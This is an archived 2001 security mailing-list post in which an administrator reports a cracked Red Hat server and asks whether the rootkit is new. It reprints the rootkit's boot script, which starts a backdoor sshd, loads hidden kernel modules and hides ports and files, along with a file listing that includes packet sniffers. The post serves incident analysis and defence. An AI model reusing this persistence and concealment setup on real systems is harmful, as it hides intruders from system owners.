Security Incidents mailing list archives
Cracked. Possible(?) new rootkit ?
From: maarten van den Berg <maarten () VBVB NL>
Date: Wed, 14 Feb 2001 16:21:17 +0100
Hi Maybe I'm mistaken and this is old stuff, but... I recently found a box which was obviously cracked, at least all the evidence definitely points that way...: After a (kernel-)upgrade, some service led to crashing the whole machine. The service in question was called "system", and this is what /etc/rc.d/rc3.d/S99system looks like: _____ cut here ______ #!/bin/sh # # This script will be executed *after* all the other init scripts. # You can put your own initialization stuff in here if you don't # want to do the full Sys V style init stuff. /var/kerb/ssh.d > /dev/null 2> /dev/null /sbin/insmod -f /var/kerb/supernw.o > /dev/null 2> /dev/null /sbin/insmod -f /var/kerb/supermd.o > /dev/null 2> /dev/null /bin/kill -31 `/var/kerb/pidof ssh.d` > /dev/null 2> /dev/null #exec redir #/var/kerb/ered /usr/sbin/in.ftpd /usr/bin/in.ftpd /var/kerb/nethide ":1F98" > /dev/null 2> /dev/null /var/kerb/nethide ":1F91" > /dev/null 2> /dev/null /var/kerb/nethide ":1F92" > /dev/null 2> /dev/null #/var/kerb/hidef /usr/bin/in.ftpd > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/ered > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/nethide > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/pidof > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/rexec > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/ssh.d > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/k.a > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/sd.a > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/supernw.o > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/supermd.o > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/p > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/l > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/s > /dev/null 2> /dev/null /var/kerb/hidef /etc/rc.d/rc3.d/S99system > /dev/null 2> /dev/null /var/kerb/hidef /etc/rc.d/rc5.d/S99system > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/hidef > /dev/null 2> /dev/null _____ cut here _____ Judging just from the file, an alternative sshd (ssh.d) is started, two kernel-modules are inserted, a binary hides certain strings in something network-related, and a binary 'hidef' hides everything including itself. I have not had time yet to do any more research, but I bet it was just pure luck that this toolkit didn't function well under a new kernel, thus exposing itself... I know what to do now, reinstall from scratch, but I was wondering if this is interesting stuff for the list, or that it is merely the Nth+1 crack of a Redhat box (not MY favorite flavour, btw) with a well-known rootkit etc. Oh, and by the way: Before discovery, I ran chkrootkit v 0.19, but that didn't detect anything, running or otherwise. Maarten _____ Listing of /var/kerb/ _____ drwxr-xr-x root/ftp 0 2000-07-27 21:40:46 kerb/ drwxr-xr-x root/root 0 2000-07-12 03:43:50 kerb/s/ -rwxr-xr-x root/root 129076 2000-07-12 03:20:11 kerb/s/dsniff -rwxr-xr-x root/root 20100 2000-07-12 03:20:16 kerb/s/arpredirect -rw-r--r-- root/root 1009 2000-07-12 03:43:50 kerb/s/dsniff.services -rwxr-xr-x root/root 93580 2000-07-12 03:26:17 kerb/s/urlsnarf -rwxr-xr-x root/ftp 13468 2000-07-12 08:29:59 kerb/ered -rwxr-xr-x root/ftp 3984 2000-07-12 08:29:59 kerb/hidef -rw-r--r-- root/ftp 537 2000-07-12 08:29:59 kerb/k.a -rwxr-xr-x root/ftp 35016 2000-07-12 08:29:59 kerb/l -rwxr-xr-x root/ftp 13036 2000-07-12 08:29:59 kerb/nethide -rwxr-xr-x root/ftp 27896 2000-07-12 08:29:59 kerb/p -rwxr-xr-x root/ftp 8128 2000-07-12 08:29:59 kerb/pidof -rw------- root/ftp 512 2001-02-14 16:01:40 kerb/sd.a -rwxr-xr-x root/ftp 196408 2000-07-12 08:29:59 kerb/ssh.d -rw-r--r-- root/ftp 960 2000-07-12 08:29:59 kerb/supermd.o -rw-r--r-- root/ftp 12292 2000-07-12 08:29:59 kerb/supernw.o _____ end of listing _____
Current thread:
- Cracked. Possible(?) new rootkit ? maarten van den Berg (Feb 14)
- Re: Cracked. Possible(?) new rootkit ? Jeremy Hanmer (Feb 14)
- Re: Cracked. Possible(?) new rootkit ? Ryan Hilton (Feb 14)
- Re: Cracked. Possible(?) new rootkit ? Michael Witt (Feb 14)
- Re: Cracked. Possible(?) new rootkit ? Jeremy Hanmer (Feb 14)